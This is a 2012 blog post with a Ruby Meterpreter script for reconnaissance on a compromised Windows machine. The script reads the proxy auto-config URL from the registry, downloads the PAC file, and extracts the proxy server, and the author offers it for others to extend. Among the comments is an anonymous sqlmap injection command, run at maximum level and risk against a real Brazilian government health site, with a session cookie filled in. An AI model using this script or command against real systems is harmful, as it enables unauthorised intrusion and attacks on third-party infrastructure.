Sunday, 12 February 2012

Reading proxy auto config (pac) file with meterpreter

Since i am a web-security person (duh duh), please pardon me if you find this erroneous or useless.

The following meterpreter script is an example of reading proxy auto config file (pac) to check for the proxy servers being used by compromised machine.

Tested on Windows XP only.

#This is just a concept of reading pac file from the compromised machine.
#You can take the stuff ahead from here :-)
#oldmanlab@gmail.com

#Variable initialization
session = client

if session.platform =~ /win32|win64/

           #Read the key and the get the AutoConfig URL
           open_key = session.sys.registry.open_key(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion
                      \Internet Settings', KEY_READ)
           begin
                 url = open_key.query_value('AutoConfigURL').data
                 print_status('Reading pac file.....')

                 #Download the pac file
                 session.railgun.add_dll('urlmon','urlmon')
                 session.railgun.add_function('urlmon', 'URLDownloadToFileW', 'DWORD', [['PBLOB', 'pCaller', 'in'],
                 ['PWCHAR','szURL','in'],['PWCHAR','szFileName','in'],['DWORD','dwReserved','in'],['PBLOB','lpfnCB','inout']])
                 session.railgun.urlmon.URLDownloadToFileW(nil,url,'proxy.pac',0,nil)

                 #Read the file and search for the proxy servers
                 proxy_data = ''
                 temp = session.fs.file.new('proxy.pac','rb')
                 until temp.eof?
                           proxy_data << temp.read
                 end
                 proxy_host = proxy_data.match(/PROXY(.*)";/)[1]
                 print_status('The proxy server is:'+proxy_host)

           rescue
                 print_status('No pac file found')

           end
else
           print_status('Victim is not using Windows')
end

I never did code in ruby before so any suggestions are welcome.
Posted by at
Labels: , ,

3 comments:

  1. Subhash Dasyam12 February 2012 at 16:01

    What do you mean by Pac files ? could you explain

    ReplyDelete
  2. oldman12 February 2012 at 22:04

    pac file is used by firefox or IE (chrome etc) for dynamically assigning proxy servers for certain domains. As an example, if the domain matches *.somewebsitename.com then it should go through proxy, else the other domain should access internet directly blah blah...Much like a foxyproxy firefox addon URL pattern feature.

    As a sample pac file, check this http://www.symantec.com/business/support/index?page=content&id=HOWTO54198

    ReplyDelete
  3. Anonymous22 November 2015 at 01:29

    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://bvsms2.saude.gov.br' --data="id=5&text=dummy" --level=5 risk=3 -p id --suffix="BR" -v3

    ReplyDelete

Subscribe to: Post Comments (Atom)